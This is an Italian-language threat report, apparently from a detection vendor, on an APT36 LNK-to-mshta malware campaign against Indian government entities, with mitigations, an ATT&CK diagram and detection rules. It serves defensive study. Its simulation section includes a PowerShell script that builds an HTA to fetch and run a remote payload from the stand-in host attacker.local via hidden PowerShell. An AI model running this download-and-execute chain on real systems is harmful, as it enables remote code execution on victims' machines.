APT36: Campagna di Malware LNK Multi-Fase che Prende di Mira EntitĂ Governative Indiane
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
APT36 (Transparent Tribe) ha condotto una campagna di spear-phishing che ha consegnato una scorciatoia LNK malevola mascherata da PDF. Quando aperto, il collegamento lancia mshta.exe per eseguire un loader basato su HTA che decritta ed esegue payloads in memoria, inclusi un modulo di configurazione e un RAT DLL con tutte le funzionalitĂ . Il malware seleziona dinamicamente i metodi di persistenza basati sul prodotto antivirus installato sulla vittima e si connette al suo server di comando e controllo su un canale crittografato. L’attività è valutata come focalizzata sull’espionaggio, prendendo di mira organizzazioni governative e accademiche indiane per rubare dati.
Indagine
I ricercatori hanno analizzato il file LNK insolitamente grande, tracciato il contenuto HTA incorporato ospitato su innlive.in, e ingegnerizzato al contrario la logica di decrittazione. La catena ha rivelato due fasi principali: un payload di deserializzazione .NET utilizzato per indebolire o bypassare i controlli di sicurezza, seguito da un DLL malevolo senza file (ad es., ki2mtmkl.dll / iinneldc.dll) che fornisce funzionalitĂ RAT. Il comportamento di persistenza è stato mappato a specifici prodotti antivirus e dettagli chiave C2—come porta TCP 8621 e una chiave AES usata per il traffico crittografato—sono stati estratti durante l’analisi.
Mitigazione
Limitare o mettere in quarantena i file shortcut (.lnk) allegati consegnati via email, particolarmente quando confezionati in archivi ZIP. Applicare politiche di controllo delle applicazioni per limitare l’esecuzione di mshta.exe, PowerShell e altri engine di scripting da percorsi scrivibili dall’utente. Utilizzare rilevazioni endpoint per catene di processo che coinvolgono mshta.exe e indicatori di esecuzione DLL in memoria, e applicare severi controlli di uscita per bloccare la comunicazione con domini sconosciuti o non fidati.
Risposta
Se viene rilevata un’esecuzione LNK sospetta, isolare il sistema, acquisire immagini della memoria e cercare indicatori DLL in memoria legati alla fase RAT. Bloccare i domini malevoli identificati e l’infrastruttura IP correlata, e ruotare le credenziali potenzialmente esposte. Eseguire un’analisi forense per localizzare artefatti di persistenza nella cartella di avvio e nel registro, rimuoverli, e convalidare che non rimangano ulteriori punti d’appoggio.
“graph TB %% Class definitions classDef technique fill:#cfe2f3 %% Node definitions tech_T1566_001[“<b>Tecnica</b> – <b>T1566.001</b> Phishing: Spearphishing Attachment<br />Invia email mirato con allegato dannoso”] class tech_T1566_001 technique tech_T1218_005[“<b>Tecnica</b> – <b>T1218.005</b> Esecuzione di Proxy di Sistema Binario: Mshta<br />Esegui HTA dannoso tramite mshta.exe”] class tech_T1218_005 technique tech_T1059_001[“<b>Tecnica</b> – <b>T1059.001</b> PowerShell<br />Esegui comandi PowerShell per scaricare payload”] class tech_T1059_001 technique tech_T1059_005[“<b>Tecnica</b> – <b>T1059.005</b> Visual Basic<br />Esegui script HTA usando VBScript”] class tech_T1059_005 technique tech_T1027[“<b>Tecnica</b> – <b>T1027</b> File o Informazioni Offuscati<br />Il payload è codificato/crittografato a strati”] class tech_T1027 technique tech_T1055[“<b>Tecnica</b> – <b>T1055</b> Iniezione di Processo<br />Inietta DLL dannoso in processo legittimo”] class tech_T1055 technique tech_T1547_001[“<b>Tecnica</b> – <b>T1547.001</b> Esecuzione Autostart di Avvio o Accesso: Cartella di Avvio<br />Persisti tramite scorciatoia in Avvio”] class tech_T1547_001 technique tech_T1112[“<b>Tecnica</b> – <b>T1112</b> Modifica del Registro<br />Aggiungi chiavi Run per la persistenza”] class tech_T1112 technique tech_T1036[“<b>Tecnica</b> – <b>T1036</b> Mascheramento<br />LNK si maschera da PDF”] class tech_T1036 technique tech_T1518_001[“<b>Tecnica</b> – <b>T1518.001</b> Scoperta di Software: Scoperta di Software di Sicurezza<br />Interroga AV installato”] class tech_T1518_001 technique tech_T1082[“<b>Tecnica</b> – <b>T1082</b> Scoperta delle Informazioni di Sistema<br />Raccogli OS, nome utente, ecc.”] class tech_T1082 technique tech_T1057[“<b>Tecnica</b> – <b>T1057</b> Scoperta dei Processi<br />Enumera processi”] class tech_T1057 technique tech_T1083[“<b>Tecnica</b> – <b>T1083</b> Scoperta di File e Directory<br />Cerca documenti”] class tech_T1083 technique tech_T1115[“<b>Tecnica</b> – <b>T1115</b> Dati degli Appunti<br />Cattura dati degli appunti”] class tech_T1115 technique tech_T1113[“<b>Tecnica</b> – <b>T1113</b> Cattura dello Schermo<br />Cattura screenshot”] class tech_T1113 technique tech_T1041[“<b>Tecnica</b> – <b>T1041</b> Esfiltrazione Tramite Canale C2<br />Esfiltra dati tramite C2”] class tech_T1041 technique tech_T1573[“<b>Tecnica</b> – <b>T1573</b> Canale Crittografato<br />Traffico C2 crittografato”] class tech_T1573 technique %% Connections tech_T1566_001 u002du002d>|leads_to| tech_T1218_005 tech_T1218_005 u002du002d>|leads_to| tech_T1059_001 tech_T1218_005 u002du002d>|leads_to| tech_T1059_005 tech_T1059_001 u002du002d>|leads_to| tech_T1027 tech_T1027 u002du002d>|leads_to| tech_T1055 tech_T1055 u002du002d>|leads_to| tech_T1547_001 tech_T1547_001 u002du002d>|leads_to| tech_T1112 tech_T1218_005 u002du002d>|leads_to| tech_T1036 tech_T1036 u002du002d>|leads_to| tech_T1518_001 tech_T1518_001 u002du002d>|leads_to| tech_T1082 tech_T1082 u002du002d>|leads_to| tech_T1057 tech_T1057 u002du002d>|leads_to| tech_T1083 tech_T1083 u002du002d>|leads_to| tech_T1115 tech_T1083 u002du002d>|leads_to| tech_T1113 tech_T1115 u002du002d>|leads_to| tech_T1041 tech_T1113 u002du002d>|leads_to| tech_T1041 tech_T1055 u002du002d>|leads_to| tech_T1573 “
Flusso di Attacco
Rilevamenti
Possibile File LNK Malevolo con Doppia Estensione (via cmdline)
Visualizza
Comportamento di Elusione della Difesa LOLBAS MSHTA Sospetto per Rilevazione di Comandi Associati (via process_creation)
Visualizza
Binari / Script Sospetti in Posizione Autostart (via file_event)
Visualizza
File Sospetti nel Profilo Utente Pubblico (via file_event)
Visualizza
Esecuzione Sospetta dal Profilo Utente Pubblico (via process_creation)
Visualizza
IOC (SourceIP) per rilevare: APT36 : Campagna Malware LNK Multi-Fase Targeting EntitĂ Governative Indiane
Visualizza
IOC (HashSha256) per rilevare: APT36 : Campagna Malware LNK Multi-Fase Targeting EntitĂ Governative Indiane
Visualizza
IOC (DestinationIP) per rilevare: APT36 : Campagna Malware LNK Multi-Fase Targeting EntitĂ Governative Indiane
Visualizza
Esecuzione di mshta.exe con PowerShell o CMD [Creazione Processo Windows]
Visualizza
Rilevazione di Dominio Malevolo APT36 e Comunicazione C2 [Connessione di Rete Windows]
Visualizza
Rilevazione di Chiave AES Integrata nella Campagna APT36 [Sysmon Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere passato.
Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrazione di Attacco & Comandi:
Un avversario ha ottenuto accesso PowerShell a basso privilegio su una workstation compromessa. Per eseguire un payload remoto senza scrivere un eseguibile su disco, l’attaccante utilizzamshta.exeper eseguire un file HTA che recupera un backdoor PowerShell da un server C2. I passaggi sono:- Codifica un HTA malevolo minimo che lancia PowerShell per scaricare ed eseguire un payload.
- Ospita l’HTA su un server web (es.,
http://attacker.local/malicious.hta). - Dalla sessione PowerShell compromessa, invoca
mshta.execon l’URL remoto come argomento.
Questa catena crea un evento di creazione di processo dove
mshta.exeè il figlio dipowershell.exe, corrispondendo precisamente alla regola Sigma. -
Script di Test di Regressione:
#------------------------------------------------- # Script simulato dell'attaccante – attiva la regola #------------------------------------------------- # 1. Definisci l'HTA malevolo (inline per scopi dimostrativi) $htaContent = @" <script> // Scarica ed esegui un payload PowerShell di prova var url = 'http://attacker.local/payload.ps1'; var xhr = new ActiveXObject('Microsoft.XMLHTTP'); xhr.open('GET', url, false); xhr.send(); var ps = new ActiveXObject('WScript.Shell'); ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false); </script> "@ # 2. Scrivi l'HTA in posizione temporanea (simulando un file ospitato) $tempPath = "$env:TEMPmalicious.hta" $htaContent | Set-Content -Path $tempPath -Encoding ASCII # 3. Lancia mshta.exe da PowerShell (il trigger del rilevamento) $mshta = (Get-Command mshta.exe).Source Write-Host "[*] Avviando mshta.exe per eseguire il payload HTA..." Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow # Optional: Sospendi per consentire la cattura dell'evento Start-Sleep -Seconds 5 # Pulizia (gestita nella sezione successiva) -
Comandi di Pulizia:
# Rimuovi file HTA temporaneo Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue # Ferma eventuali processi mshta.exe persistenti (improbabile dopo esecuzione normale) Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force Write-Host "[*] Pulizia completata."